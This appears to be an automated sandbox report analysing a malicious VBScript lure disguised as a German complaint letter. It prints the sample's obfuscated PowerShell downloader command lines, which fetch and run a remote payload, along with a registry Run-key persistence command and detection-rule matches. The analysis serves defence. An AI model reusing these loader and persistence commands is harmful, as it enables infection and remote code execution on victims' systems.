tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whilJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (RuctatioJump to behavior
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8AAB321_2_00007FFD9B8AAB32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8AB8D21_2_00007FFD9B8AB8D2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00BFF1F83_2_00BFF1F8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00BFE9283_2_00BFE928
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00BFE5E03_2_00BFE5E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B5EFE813_2_04B5EFE8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B5F8B813_2_04B5F8B8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B5ECA013_2_04B5ECA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0928064713_2_09280647
                Source: Beschwerde-AutoKauf.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4549
                Source: unknownProcess created: Commandline size = 4549
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4440
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4549Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4440Jump to behavior
                Source: amsi32_2536.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: amsi32_6272.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@32/61@10/7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\raadede.ErgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_154mhipp.nca.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1620
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2536
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6272
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whil
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whil
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (Ructatio
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1756,i,10988508306873604360,9647828902671235377,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF 